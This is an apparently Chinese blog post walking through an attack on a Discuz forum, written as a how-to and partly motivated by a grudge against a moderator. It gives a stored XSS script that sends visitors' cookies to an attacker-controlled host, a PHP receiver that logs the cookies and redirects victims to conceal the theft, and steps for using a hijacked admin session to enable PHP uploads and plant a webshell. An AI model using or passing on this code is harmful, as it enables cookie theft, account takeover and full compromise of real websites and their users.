论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)
论坛插入脚本:
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);
但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气
我插入的脚本如下:
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script>
**********************************************************************************************
跨站攻击脚本:
reg.php
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>
<script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //转移页面隐蔽上面记录cookie的操作
************************************************************************************
剩下的步骤就是等着鱼自己上钩了
当管理员帐号点入论坛某个页面时,这个页面却被转到了某新闻网站,其实不知,他的cookie已经被记录
拿这个cookie登录论坛,(删东西不推荐哦~~),可以临时开启上传php文件,例如phpwebshell,然后再关闭,这样你就可以很轻松的操控整个论坛站点
为什么选择此论坛做入侵讲解,很简单,这个论坛具备了多个漏洞:
一、论坛有XSS漏洞,没有对输入输出做过滤
二、论坛采用cookie方式记录用户信息
三、对论坛上某个版主看不惯,有点权利乱封号,不过,毕竟论坛不是那个人的,还是对管理员手下留情吧(做人要厚道!)
更多关于Discuz论坛内容来自木庄网络博客
标签:Discuz论坛
相关阅读 >>
推荐一个比较不错简单的php运行平台软件phpnow 搭建 php 环境[安装图文教程]
完美转换mysql的字符集 解决查看utf8源文件中的乱码问题
discuz!5的php代码高亮显示插件(黑暗中的舞者更新)
更多相关阅读请进入《Discuz论坛》频道 >>